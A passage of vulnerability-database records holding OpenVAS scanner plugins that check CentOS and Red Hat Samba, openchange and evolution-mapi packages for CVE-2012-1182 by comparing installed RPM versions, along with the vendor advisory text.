Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != 
NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.0.33~3.39.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-11T11:06:26", "description": "Check for the Version of samba3x", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for samba3x CESA-2012:0466 centos5 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-01-10T00:00:00", "id": "OPENVAS:881228", "href": "http://plugins.openvas.org/nasl.php?oid=881228", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for samba3x CESA-2012:0466 centos5 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n \n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. 
After installing this\n update, the smb service will be restarted automatically.\";\n\ntag_affected = \"samba3x on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-April/018561.html\");\n script_id(881228);\n script_version(\"$Revision: 8352 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-10 08:01:57 +0100 (Wed, 10 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:53:03 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2012:0466\");\n script_name(\"CentOS Update for samba3x CESA-2012:0466 centos5 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of samba3x\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba3x\", rpm:\"samba3x~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-client\", rpm:\"samba3x-client~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-common\", rpm:\"samba3x-common~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-doc\", rpm:\"samba3x-doc~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-domainjoin-gui\", rpm:\"samba3x-domainjoin-gui~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-swat\", rpm:\"samba3x-swat~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-winbind\", rpm:\"samba3x-winbind~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-winbind-devel\", rpm:\"samba3x-winbind-devel~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:16", "description": "The remote host is missing an update for the 'samba4' package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2013-02-22T00:00:00", "type": "openvas", "title": "RedHat Update for samba4 RHSA-2013:0506-02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310870935", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870935", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba4 RHSA-2013:0506-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program 
is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2013-February/msg00049.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870935\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-22 10:02:23 +0530 (Fri, 22 Feb 2013)\");\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"RHSA\", value:\"2013:0506-02\");\n script_name(\"RedHat Update for samba4 RHSA-2013:0506-02\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba4'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n script_tag(name:\"affected\", value:\"samba4 on Red Hat 
Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\n compiler, used to generate code to handle RPC calls. This could result in\n code generated by the PIDL compiler to not sufficiently protect against\n buffer overflows. (CVE-2012-1182)\n\n The samba4 packages have been upgraded to upstream version 4.0.0, which\n provides a number of bug fixes and enhancements over the previous version.\n In particular, improved interoperability with Active Directory (AD)\n domains. SSSD now uses the libndr-krb5pac library to parse the Privilege\n Attribute Certificate (PAC) issued by an AD Key Distribution Center (KDC).\n\n The Cross Realm Kerberos Trust functionality provided by Identity\n Management, which relies on the capabilities of the samba4 client library,\n is included as a Technology Preview. This functionality and server\n libraries, is included as a Technology Preview. This functionality uses the\n libndr-nbt library to prepare Connection-less Lightweight Directory Access\n Protocol (CLDAP) messages.\n\n Additionally, various improvements have been made to the Local Security\n Authority (LSA) and Net Logon services to allow verification of trust\n from a Windows system. Because the Cross Realm Kerberos Trust functionality\n is considered a Technology Preview, selected samba4 components are\n considered to be a Technology Preview. 
For more information on which Samba\n packages are considered a Technology Preview, refer to Table 5.1, Samba4\n Package Support in the Release Notes, linked to from the References.\n (BZ#766333, BZ#882188)\n\n This update also fixes the following bug:\n\n * Prior to this update, if the Active Directory (AD) server was rebooted,\n Winbind sometimes failed to reconnect when requested by wbinfo -n or\n wbinfo -s commands. Consequently, looking up users using the wbinfo tool\n failed. This update applies upstream patches to fix this problem and now\n looking up a Security Identifier (SID) for a username, or a username for a\n given SID, works as expected after a domain controller is rebooted.\n (BZ#878564)\n\n All users of samba4 are advised to upgrade to these updated packages,\n which fix these issues and add these enhancements.\n\n Warning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\n Enterprise Linux 6.4 and you have Samba in use, you should make sure that\n you uninstall the package named samba4 to avoid conflicts during the\n upgrade.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-client\", rpm:\"samba4-client~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-common\", rpm:\"samba4-common~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-dc\", rpm:\"samba4-dc~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-dc-libs\", rpm:\"samba4-dc-libs~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-debuginfo\", rpm:\"samba4-debuginfo~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-devel\", rpm:\"samba4-devel~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-libs\", rpm:\"samba4-libs~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-pidl\", rpm:\"samba4-pidl~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-python\", rpm:\"samba4-python~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-swat\", rpm:\"samba4-swat~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-test\", rpm:\"samba4-test~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind\", rpm:\"samba4-winbind~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind-clients\", rpm:\"samba4-winbind-clients~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind-krb5-locator\", rpm:\"samba4-winbind-krb5-locator~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2019-05-29T18:38:08", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-03-12T00:00:00", "type": "openvas", "title": "CentOS Update for openchange CESA-2013:0515 centos6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881680", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881680", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for openchange CESA-2013:0515 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-March/019453.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881680\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-12 10:02:45 +0530 (Tue, 12 Mar 2013)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2013:0515\");\n script_name(\"CentOS Update for openchange CESA-2013:0515 centos6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openchange'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"openchange on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The openchange packages provide libraries to access Microsoft Exchange\n servers using native protocols. 
Evolution-MAPI uses these libraries to\n integrate the Evolution PIM application with Microsoft Exchange servers.\n\n A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\n compiler. As OpenChange uses code generated by PIDL, this could have\n resulted in buffer overflows in the way OpenChange handles RPC calls. With\n this update, the code has been generated with an updated version of PIDL to\n correct this issue. (CVE-2012-1182)\n\n The openchange packages have been upgraded to upstream version 1.0, which\n provides a number of bug fixes and enhancements over the previous version,\n including support for the rebased samba4 packages and several API changes.\n (BZ#767672, BZ#767678)\n\n This update also fixes the following bugs:\n\n * When the user tried to modify a meeting with one required attendee and\n himself as the organizer, a segmentation fault occurred in the memcpy()\n function. Consequently, the evolution-data-server application terminated\n unexpectedly with a segmentation fault. This bug has been fixed and\n evolution-data-server no longer crashes in the described scenario.\n (BZ#680061)\n\n * Prior to this update, OpenChange 1.0 was unable to send messages with\n a large message body or with extensive attachment. This was caused by minor\n issues in OpenChange's exchange.idl definitions. 
This bug has been fixed\n and OpenChange now sends extensive messages without complications.\n (BZ#870405)\n\n All users of openchange are advised to upgrade to these updated packages,\n which fix these issues and add these enhancements.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openchange\", rpm:\"openchange~1.0~4.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openchange-client\", rpm:\"openchange-client~1.0~4.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openchange-devel\", rpm:\"openchange-devel~1.0~4.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openchange-devel-docs\", rpm:\"openchange-devel-docs~1.0~4.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:51:53", "description": "Check for the Version of samba4", "cvss3": {}, "published": "2013-03-12T00:00:00", "type": "openvas", "title": "CentOS Update for samba4 CESA-2013:0506 centos6 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:881650", "href": "http://plugins.openvas.org/nasl.php?oid=881650", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for samba4 CESA-2013:0506 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, 
http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\n compiler, used to generate code to handle RPC calls. This could result in\n code generated by the PIDL compiler to not sufficiently protect against\n buffer overflows. (CVE-2012-1182)\n \n The samba4 packages have been upgraded to upstream version 4.0.0, which\n provides a number of bug fixes and enhancements over the previous version.\n In particular, improved interoperability with Active Directory (AD)\n domains. SSSD now uses the libndr-krb5pac library to parse the Privilege\n Attribute Certificate (PAC) issued by an AD Key Distribution Center (KDC).\n \n The Cross Realm Kerberos Trust functionality provided by Identity\n Management, which relies on the capabilities of the samba4 client library,\n is included as a Technology Preview. This functionality and server\n libraries, is included as a Technology Preview. 
This functionality uses the\n libndr-nbt library to prepare Connection-less Lightweight Directory Access\n Protocol (CLDAP) messages.\n \n Additionally, various improvements have been made to the Local Security\n Authority (LSA) and Net Logon services to allow verification of trust\n from a Windows system. Because the Cross Realm Kerberos Trust functionality\n is considered a Technology Preview, selected samba4 components are\n considered to be a Technology Preview. For more information on which Samba\n packages are considered a Technology Preview, refer to Table 5.1, "Samba4\n Package Support" in the Release Notes, linked to from the References.\n (BZ#766333, BZ#882188)\n \n This update also fixes the following bug:\n \n * Prior to this update, if the Active Directory (AD) server was rebooted,\n Winbind sometimes failed to reconnect when requested by "wbinfo -n" or\n "wbinfo -s" commands. Consequently, looking up users using the wbinfo tool\n failed. This update applies upstream patches to fix this problem and now\n looking up a Security Identifier (SID) for a username, or a username for a\n given SID, works as expected after a domain controller is rebooted.\n (BZ#878564)\n \n All users of samba4 are advised to upgrade to these updated packages,\n which fix these issues and add these enhancements.\n \n Warning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\n Enterprise Linux 6.4 and you have Samba in use, you should make sure that\n you uninstall the package named "samba4" to avoid conflicts during the\n upgrade.\";\n\n\ntag_affected = \"samba4 on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2013-March/019498.html\");\n script_id(881650);\n script_version(\"$Revision: 6655 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:48:58 +0200 (Mon, 10 Jul 2017) $\");\n 
script_tag(name:\"creation_date\", value:\"2013-03-12 10:00:01 +0530 (Tue, 12 Mar 2013)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2013:0506\");\n script_name(\"CentOS Update for samba4 CESA-2013:0506 centos6 \");\n\n script_summary(\"Check for the Version of samba4\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-client\", rpm:\"samba4-client~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-common\", rpm:\"samba4-common~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-dc\", rpm:\"samba4-dc~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-dc-libs\", rpm:\"samba4-dc-libs~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"samba4-devel\", rpm:\"samba4-devel~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-libs\", rpm:\"samba4-libs~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-pidl\", rpm:\"samba4-pidl~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-python\", rpm:\"samba4-python~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-swat\", rpm:\"samba4-swat~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-test\", rpm:\"samba4-test~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind\", rpm:\"samba4-winbind~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind-clients\", rpm:\"samba4-winbind-clients~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind-krb5-locator\", rpm:\"samba4-winbind-krb5-locator~4.0.0~55.el6.rc4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-18T11:09:26", "description": "Check for the Version of evolution-mapi", "cvss3": {}, "published": "2013-03-12T00:00:00", "type": "openvas", "title": "CentOS Update for evolution-mapi CESA-2013:0515 centos6 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-01-17T00:00:00", 
"id": "OPENVAS:881654", "href": "http://plugins.openvas.org/nasl.php?oid=881654", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for evolution-mapi CESA-2013:0515 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 